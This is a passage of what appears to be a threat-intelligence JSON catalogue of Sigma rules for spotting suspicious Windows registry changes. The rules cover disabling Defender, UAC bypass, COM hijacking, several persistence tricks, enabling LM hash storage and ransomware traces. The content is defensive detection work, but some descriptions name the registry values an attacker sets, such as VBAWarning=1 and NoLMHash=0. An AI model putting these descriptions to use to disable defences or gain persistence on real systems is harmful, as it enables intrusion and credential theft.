], "type": "related-to" } ], "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", "value": "New Application in AppCompat" }, { "description": "Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-16", "falsepositive": [ "Legitimate use of external DB to save the results" ], "filename": "registry_set_bginfo_custom_db.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_db.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53330955-dc52-487f-a3a2-da24dcff99b5", "value": "New BgInfo.EXE Custom DB Path Registry Configuration" }, { "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-04", "falsepositive": [ "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "value": "Disabled Windows Defender Eventlog" }, { "description": "Detects disabling Windows Defender Tamper Protection", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", "value": "Disable Tamper Protection on Windows Defender" }, { "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-23", "falsepositive": [ "Other legitimate network providers used and not filtred in this rule" ], "filename": "registry_set_new_network_provider.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade", "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", "value": "Potential Credential Dumping Attempt Using New NetworkProvider - REG" }, { "description": "Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.\nThis compatibility layer allows an application to register for restart using the \"RegisterApplicationRestart\" API.\nThis can be potentially abused as a persistence mechanism.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-01-01", "falsepositive": [ "Legitimate applications making use of this feature for compatibility reasons" ], "filename": "registry_set_persistence_app_cpmpat_layer_registerapprestart.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml" ], "tags": [ "attack.persistence", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b86852fb-4c77-48f9-8519-eb1b2c308b59", "value": "Potential Persistence Via AppCompat RegisterAppRestart Layer" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", "value": "Internet Explorer Autorun Keys Modification" }, { "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", "meta": { "author": "frack113", "creation_date": "2022-07-17", "falsepositive": [ "Unknown" ], "filename": "registry_set_fax_change_service_user.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/dottor_morte/status/1544652325570191361", "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3fdf743-f05b-4051-990a-b66919be1743", "value": "Change User Account Associated with the FAX Service" }, { "description": "Detects disabling Windows Defender PUA protection", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", "value": "Disable PUA Protection on Windows Defender" }, { "description": "Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.", "meta": { "author": "BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk", "creation_date": "2023-06-07", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_comhijack_psfactorybuffer.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine", "https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html", "https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html", "https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "243380fa-11eb-4141-af92-e14925e77c1b", "value": "Potential PSFactoryBuffer COM Hijacking" }, { "description": "Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\nBefore doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named \"Ime File\" with a DLL path.\nIMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-11-21", "falsepositive": [ "Unknown" ], "filename": "registry_set_ime_suspicious_paths.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ime_suspicious_paths.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d8f9bb8-01af-4e15-a3a2-349071530530", "value": "Suspicious Path In Keyboard Layout IME File Registry Value" }, { "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", "meta": { "author": "frack113", "creation_date": "2022-01-24", "falsepositive": [ "Unknown" ], "filename": "registry_set_blackbyte_ransomware.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83314318-052a-4c90-a1ad-660ece38d276", "value": "Blackbyte Ransomware Registry" }, { "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_natural_language.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", "https://persistence-info.github.io/Data/naturallanguage6.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "value": "Potential Persistence Via DLLPathOverride" }, { "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", "meta": { "author": "Syed Hasan (@syedhasan009)", "creation_date": "2021-06-18", "falsepositive": [ "Unknown" ], "filename": "registry_set_taskcache_entry.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://labs.f-secure.com/blog/scheduled-task-tampering/", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" ], "tags": [ "attack.persistence", "attack.t1053", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "value": "Scheduled TaskCache Change by Uncommon Program" }, { "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Legitimate custom SHIM installations will also trigger this rule" ], "filename": "registry_set_persistence_shim_database.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml" ], "tags": [ "attack.persistence", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "value": "Potential Persistence Via Shim Database Modification" }, { "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "meta": { "author": "frack113", "creation_date": "2022-12-11", "falsepositive": [ "Unknown" ], "filename": "registry_set_legalnotice_susp_message.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_legalnotice_susp_message.yml" ], "tags": [ "attack.impact", "attack.t1491.001" ] }, "related": [ { "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8b9606c9-28be-4a38-b146-0e313cc232c1", "value": "Potential Ransomware Activity Using LegalNotice Message" }, { "description": "Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper\n", "meta": { "author": "Anish Bogati", "creation_date": "2023-11-28", "falsepositive": [ "Legitimate helper added by different programs and the OS" ], "filename": "registry_set_netsh_helper_dll_potential_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll", "https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1546.007" ] }, "related": [ { "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c90362e0-2df3-4e61-94fe-b37615814cb1", "value": "Potential Persistence Via Netsh Helper DLL - Registry" }, { "description": "Detects potential PowerShell commands or code within registry run keys", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate admin or third party scripts. Baseline according to your environment" ], "filename": "registry_set_powershell_in_run_keys.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", "value": "Suspicious Powershell In Registry Run Keys" }, { "description": "Detects potential COM object hijacking via modification of default system CLSID.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-07-16", "falsepositive": [ "Unlikely" ], "filename": "registry_set_persistence_com_hijacking_builtin.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", "https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/", "https://blog.talosintelligence.com/uat-5647-romcom/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "790317c0-0a36-4a6a-a105-6e576bf99a14", "value": "COM Object Hijacking Via Modification Of Default System CLSID Default Value" }, { "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to Windows event channel.", "meta": { "author": "frack113", "creation_date": "2022-09-17", "falsepositive": [ "Unknown" ], "filename": "registry_set_change_winevt_channelaccess.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", "value": "Change Winevt Channel Access Permission Via Registry" }, { "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", "meta": { "author": "@ScoubiMtl", "creation_date": "2021-04-05", "falsepositive": [ "Unlikely" ], "filename": "registry_set_office_outlook_enable_macro_execution.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1137", "attack.t1008", "attack.t1546" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", "value": "Outlook Macro Execution Without Warning Setting Enabled" }, { "description": "Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\nBy setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-15", "falsepositive": [ "Unknown" ], "filename": "registry_set_system_lsa_nolmhash.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password", "https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c420410f-c2d8-4010-856b-dffe21866437", "value": "Enable LM Hash Storage" }, { "description": "Detects registry changes to Microsoft Office \"VBAWarning\" to a value of \"1\" which enables the execution of all macros, whether signed or unsigned.", "meta": { "author": "Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-05-22", "falsepositive": [ "Unlikely" ], "filename": "registry_set_office_vba_warnings_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91239011-fe3c-4b54-9f24-15c86bb65913", "value": "Office Macros Warning Disabled" }, { "description": "Attempts to detect system changes made by Blue Mockingbird", "meta": { "author": "Trent Liffick (@tliffick)", "creation_date": "2020-05-14", "falsepositive": [ "Unknown" ], "filename": "registry_set_mal_blue_mockingbird.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/blue-mockingbird-cryptominer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml" ], "tags": [ "attack.execution", "attack.t1112", "attack.t1047" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", "value": "Blue Mockingbird - Registry" }, { "description": "Bypasses User Account Control using a fileless method", "meta": { "author": "frack113", "creation_date": "2022-01-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_bypass_uac_using_delegateexecute.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", "https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", "value": "Bypass UAC Using DelegateExecute" }, { "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-04-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1137", "attack.t1008", "attack.t1546" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "396ae3eb-4174-4b9b-880e-dc0364d78a19", "value": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting" }, { "description": "Detects disabling Windows Defender Exploit Guard Network Protection", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", "value": "Disable Exploit Guard Network Protection on Windows Defender" }, { "description": "Detect possible persistence using Fax DLL load when service restart", "meta": { "author": "frack113", "creation_date": "2022-07-17", "falsepositive": [ "Unknown" ], "filename": "registry_set_fax_dll_persistance.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/dottor_morte/status/1544652325570191361", "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", "value": "Change the Fax Dll" }, { "description": "Detects changes to the Internet Explorer \"DisableFirstRunCustomize\" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-16", "falsepositive": [ "As this is controlled by group policy as well as user settings. Some false positives may occur." ], "filename": "registry_set_internet_explorer_disable_first_run_customize.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf", "https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "ab567429-1dfb-4674-b6d2-979fd2f9d125", "value": "Internet Explorer DisableFirstRunCustomize Enabled" }, { "description": "Detects applications or users re-enabling old TLS versions by setting the \"Enabled\" value to \"1\" for the \"Protocols\" registry key.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-05", "falsepositive": [ "Legitimate enabling of the old tls versions due to incompatibility" ], "filename": 